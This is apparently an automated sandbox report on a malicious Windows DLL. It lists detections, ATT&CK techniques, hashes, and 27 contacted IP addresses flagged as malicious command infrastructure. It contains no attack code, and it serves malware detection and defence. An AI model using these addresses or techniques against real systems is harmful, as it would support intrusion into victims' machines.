External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion2	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection112	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Regsvr321	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Rundll321	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
nV5Wu77N8J.dll	17%	Virustotal		Browse
nV5Wu77N8J.dll	14%	ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
6.2.rundll32.exe.34c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.32f0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.regsvr32.exe.4990000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
21.2.rundll32.exe.4940000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
8.2.rundll32.exe.4dd0000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
8.2.rundll32.exe.54b0000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
8.2.rundll32.exe.53b0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.regsvr32.exe.4960000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
8.2.rundll32.exe.5640000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.5610000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
8.2.rundll32.exe.54e0000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.loaddll32.exe.2b30000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.loaddll32.exe.2b00000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
1.0.loaddll32.exe.2b00000.3.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
8.2.rundll32.exe.4e00000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.loaddll32.exe.2b00000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
21.2.rundll32.exe.4970000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.loaddll32.exe.2b30000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.5380000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
1.0.loaddll32.exe.2b30000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.5670000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
https://activity.windows.comr	0%	URL Reputation	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	false		high
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 0000001B.00000003.410355876.000001BC5677A000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.409785448.000001BC56791000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000A.00000003.309573636.000002C758845000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309560133.000002C758840000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000A.00000002.310602064.000002C75883D000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000A.00000002.310602064.000002C75883D000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Transit/Stops/	svchost.exe, 0000000A.00000003.309482803.000002C758867000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.310779768.000002C758869000.00000004.00000001.sdmp	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000A.00000003.309494671.000002C75884D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.310690980.000002C758852000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000A.00000002.310602064.000002C75883D000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000A.00000003.309573636.000002C758845000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309560133.000002C758840000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	false		high
http://crl.ver)	svchost.exe, 0000001B.00000002.429490850.000001BC560EA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000A.00000002.310723606.000002C75885C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309560133.000002C758840000.00000004.00000001.sdmp	false		high
http://upx.sf.net	Amcache.hve.18.dr	false		high
https://www.tiktok.com/legal/report/feedback	svchost.exe, 0000001B.00000003.410707163.000001BC56788000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.410814184.000001BC56C19000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.410832016.000001BC56C02000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.comr	svchost.exe, 00000002.00000002.679804350.000001EEFC84F000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000A.00000002.310602064.000002C75883D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.310262590.000002C758813000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000A.00000002.310656304.000002C758842000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309560133.000002C758840000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309578524.000002C758841000.00000004.00000001.sdmp	false		high
https://%s.xboxlive.com	svchost.exe, 00000002.00000002.679804350.000001EEFC84F000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000A.00000003.309494671.000002C75884D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.310690980.000002C758852000.00000004.00000001.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000A.00000003.287584222.000002C758831000.00000004.00000001.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000A.00000003.309539722.000002C758849000.00000004.00000001.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000A.00000003.287584222.000002C758831000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000A.00000002.310723606.000002C75885C000.00000004.00000001.sdmp	false		high
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 0000001B.00000003.410355876.000001BC5677A000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.409785448.000001BC56791000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000A.00000002.310656304.000002C758842000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309560133.000002C758840000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.309578524.000002C758841000.00000004.00000001.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000A.00000002.310690980.000002C758852000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	false		high
https://disneyplus.com/legal.	svchost.exe, 0000001B.00000003.410355876.000001BC5677A000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.409785448.000001BC56791000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000A.00000002.310557127.000002C75883A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.287584222.000002C758831000.00000004.00000001.sdmp	false		high
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000A.00000002.310723606.000002C75885C000.00000004.00000001.sdmp	false		high
https://activity.windows.com	svchost.exe, 00000002.00000002.679804350.000001EEFC84F000.00000004.00000001.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 0000000A.00000002.310262590.000002C758813000.00000004.00000001.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 0000000A.00000003.309518255.000002C758860000.00000004.00000001.sdmp	false		high
http://help.disneyplus.com.	svchost.exe, 0000001B.00000003.410355876.000001BC5677A000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.409785448.000001BC56791000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000A.00000002.310602064.000002C75883D000.00000004.00000001.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 00000002.00000002.679804350.000001EEFC84F000.00000004.00000001.sdmp	false	URL Reputation: safe	low
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000A.00000003.309539722.000002C758849000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
104.131.62.48	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
185.148.168.15	unknown	Germany	44780	EVERSCALE-ASDE	true
51.210.242.234	unknown	France	16276	OVHFR	true
217.182.143.207	unknown	France	16276	OVHFR	true
69.16.218.101	unknown	United States	32244	LIQUIDWEBUS	true
159.69.237.188	unknown	Germany	24940	HETZNER-ASDE	true
45.138.98.34	unknown	Germany	9009	M247GB	true
116.124.128.206	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
210.57.209.142	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
185.148.168.220	unknown	Germany	44780	EVERSCALE-ASDE	true
54.37.228.122	unknown	France	16276	OVHFR	true
190.90.233.66	unknown	Colombia	18678	INTERNEXASAESPCO	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
62.171.178.147	unknown	United Kingdom	51167	CONTABODE	true
128.199.192.135	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553353
Start date:	14.01.2022
Start time:	19:05:02
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	nV5Wu77N8J.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winDLL@37/18@0/27
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 98.8% (good quality ratio 91.5%) Quality average: 70.1% Quality standard deviation: 27.4%
HCA Information:	Successful, ratio: 74% Number of executed functions: 41 Number of non-executed functions: 222
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 173.222.108.226, 173.222.108.210, 20.54.110.249 Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:07:01	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	nIQCsrVbbw.dll	Get hash	malicious	Browse
	hPJnda9rBy.dll	Get hash	malicious	Browse
	nV5Wu77N8J.dll	Get hash	malicious	Browse
	OZra.dll	Get hash	malicious	Browse
	RQ6mxb6ssDtBoLUIE.dll	Get hash	malicious	Browse
	EcJ8rbg.dll	Get hash	malicious	Browse
	gyZm68Cgwf.dll	Get hash	malicious	Browse
	5o8zdV3GU3.dll	Get hash	malicious	Browse
	aoPHg7b78c.dll	Get hash	malicious	Browse
	xxWrY2YG7s.dll	Get hash	malicious	Browse
	7MhGa3iotM.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse
	M2hsMd9hTq.dll	Get hash	malicious	Browse
	wg1bXKYOOs.dll	Get hash	malicious	Browse
	8ozP45Xn3V.dll	Get hash	malicious	Browse
	pugKLanrj3.dll	Get hash	malicious	Browse
	CSxylfUJcL.dll	Get hash	malicious	Browse
	nCiZXrlB39.dll	Get hash	malicious	Browse
	bEK6Xc41qp.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse
104.131.62.48	nIQCsrVbbw.dll	Get hash	malicious	Browse
	hPJnda9rBy.dll	Get hash	malicious	Browse
	nV5Wu77N8J.dll	Get hash	malicious	Browse
	OZra.dll	Get hash	malicious	Browse
	RQ6mxb6ssDtBoLUIE.dll	Get hash	malicious	Browse
	EcJ8rbg.dll	Get hash	malicious	Browse
	gyZm68Cgwf.dll	Get hash	malicious	Browse
	5o8zdV3GU3.dll	Get hash	malicious	Browse
	aoPHg7b78c.dll	Get hash	malicious	Browse
	xxWrY2YG7s.dll	Get hash	malicious	Browse
	7MhGa3iotM.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse
	M2hsMd9hTq.dll	Get hash	malicious	Browse
	wg1bXKYOOs.dll	Get hash	malicious	Browse
	8ozP45Xn3V.dll	Get hash	malicious	Browse
	pugKLanrj3.dll	Get hash	malicious	Browse
	CSxylfUJcL.dll	Get hash	malicious	Browse
	nCiZXrlB39.dll	Get hash	malicious	Browse
	bEK6Xc41qp.dll	Get hash	malicious	Browse
	vHwdqVl8yP.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-CHOOPAUS	xD2TnigEaY.exe	Get hash	malicious	Browse	208.167.249.72
	nIQCsrVbbw.dll	Get hash	malicious	Browse	66.42.57.149
	hPJnda9rBy.dll	Get hash	malicious	Browse	66.42.57.149
	nV5Wu77N8J.dll	Get hash	malicious	Browse	66.42.57.149
	1nJGU59JPU.exe	Get hash	malicious	Browse	136.244.117.138
	kGl1qp3Ox8.exe	Get hash	malicious	Browse	149.28.78.238
	OZra.dll	Get hash	malicious	Browse	66.42.57.149
	RQ6mxb6ssDtBoLUIE.dll	Get hash	malicious	Browse	66.42.57.149
	EcJ8rbg.dll	Get hash	malicious	Browse	66.42.57.149
	Comrpobante_60.vbs	Get hash	malicious	Browse	149.248.50.230
	sample.js	Get hash	malicious	Browse	45.76.154.237
	gyZm68Cgwf.dll	Get hash	malicious	Browse	66.42.57.149
	5o8zdV3GU3.dll	Get hash	malicious	Browse	66.42.57.149
	aoPHg7b78c.dll	Get hash	malicious	Browse	66.42.57.149
	xxWrY2YG7s.dll	Get hash	malicious	Browse	66.42.57.149
	7MhGa3iotM.dll	Get hash	malicious	Browse	66.42.57.149
	vHwdqVl8yP.dll	Get hash	malicious	Browse	66.42.57.149
	M2hsMd9hTq.dll	Get hash	malicious	Browse	66.42.57.149
	wg1bXKYOOs.dll	Get hash	malicious	Browse	66.42.57.149
	8ozP45Xn3V.dll	Get hash	malicious	Browse	66.42.57.149
DIGITALOCEAN-ASNUS	nIQCsrVbbw.dll	Get hash	malicious	Browse	128.199.192.135
	hPJnda9rBy.dll	Get hash	malicious	Browse	128.199.192.135
	nV5Wu77N8J.dll	Get hash	malicious	Browse	128.199.192.135
	vk8A1dXh5C.exe	Get hash	malicious	Browse	188.166.28.199
	GahImDA8DA.exe	Get hash	malicious	Browse	188.166.28.199
	prkVkqYIwv.exe	Get hash	malicious	Browse	188.166.28.199
	OZra.dll	Get hash	malicious	Browse	128.199.192.135
	RQ6mxb6ssDtBoLUIE.dll	Get hash	malicious	Browse	128.199.192.135
	EcJ8rbg.dll	Get hash	malicious	Browse	128.199.192.135
	P42zLwaJQk.exe	Get hash	malicious	Browse	188.166.28.199
	9ro85QVN0F.exe	Get hash	malicious	Browse	188.166.28.199
	hWLlYv2MAX	Get hash	malicious	Browse	159.89.53.206
	sample.js	Get hash	malicious	Browse	138.197.222.36
	Mc7TWWp1Vp.exe	Get hash	malicious	Browse	188.166.28.199
	sbxGIUIhRd.exe	Get hash	malicious	Browse	188.166.28.199
	6zsU4O4WHq.exe	Get hash	malicious	Browse	188.166.28.199
	Bank Swift Copy 1027263738.exe	Get hash	malicious	Browse	178.128.244.245
	gyZm68Cgwf.dll	Get hash	malicious	Browse	128.199.192.135
	5o8zdV3GU3.dll	Get hash	malicious	Browse	128.199.192.135
	aoPHg7b78c.dll	Get hash	malicious	Browse	128.199.192.135

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_7d3365b34093db6d884642e334bbbe4e6283fce_7cac0383_0d82d310\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7987858253359225
Encrypted:	false
SSDEEP:	96:3y1wBnYyWy9haol7JfapXIQcQSc6mcEUcw3/s+a+z+HbHg1VG4rmMoVazWbSmEBw:isn6Hsieryjlq/u7sYS274ItW
MD5:	8991A50910FD04404E3D05E0C536E5B4
SHA1:	2EEC72EF2F4D1A6CA5E2E140B822306EF0AD917F
SHA-256:	F051C6A067B457B3D82EA6584B7AD2561B0E939809CA0192E94617E032499625
SHA-512:	1C4E8DE4838E826ACF40E802AB16355B9B831441FBA7D222AA708FFB33D1D5444BDD286EBA448CFA8CF1844BE40753A26037D55C27FC175667FDAB651826C45A
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.8.9.5.6.7.3.5.7.4.0.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.c.3.f.c.d.3.3.-.0.6.9.c.-.4.7.d.f.-.a.e.1.c.-.c.b.a.2.2.9.5.e.c.1.2.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.4.9.9.5.8.f.-.7.4.f.1.-.4.5.b.6.-.8.c.b.f.-.0.e.2.4.3.4.e.7.3.c.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.8.4.-.0.0.0.1.-.0.0.1.c.-.b.c.c.d.-.7.d.d.0.b.c.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.2././.1.3.:.0.9.:.0.7.:.1.6.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5BDC.tmp.csv Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	52846
Entropy (8bit):	3.044431209938396
Encrypted:	false
SSDEEP:	1536:IKHougBs11B6cFV4j6BfRtc3zd5hUwTBawpiaUav1Wk42uZK:IKHougBs11B6cFV4j6BfRtcDd5hUwTBn
MD5:	9AC3F84A170D0BA7C3BF7A942BC9AD2C
SHA1:	8AE191729FDA11A9AD787073144DD3800D60AFB4
SHA-256:	650DBA864290DEC64F543C71045A6865E09E9B4BAB66F19324A800B86165A5D1
SHA-512:	2D7813A5BA387245D6ABCDE68600B23D31C1142EBD858B5B3A7B387854DC3E1302F685F86A58B6DDA16EE2D738CA4D5209BD4F9D0187AB9CEED55474D8250102
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER60EE.tmp.txt Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6950066722735335
Encrypted:	false
SSDEEP:	96:9GiZYWaH2WmY3YLTWM0xHhYEZugtk0i+ONVZFw+c1WMaAE+utDI293:9jZDVg8bZtxOaAE+utM293
MD5:	80853B5DA19A59FFFB85C9684A03CA60
SHA1:	EC92583B0022F173F0C0496411B348BBA01B1BAF
SHA-256:	CEF8FFDFB673B4E9D316B88311E534ED1C56CDAD503FBF56CD6542069BAB4F22
SHA-512:	E038BBACAA5E1B41088AB24C5409AE577A7012C35DCB00A15C21ECDA7B27B7BA03C934D79C2B95CBA958E2BD0F60FA42A5B581E5D6B4E29D1A9F91AEFC921492
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . 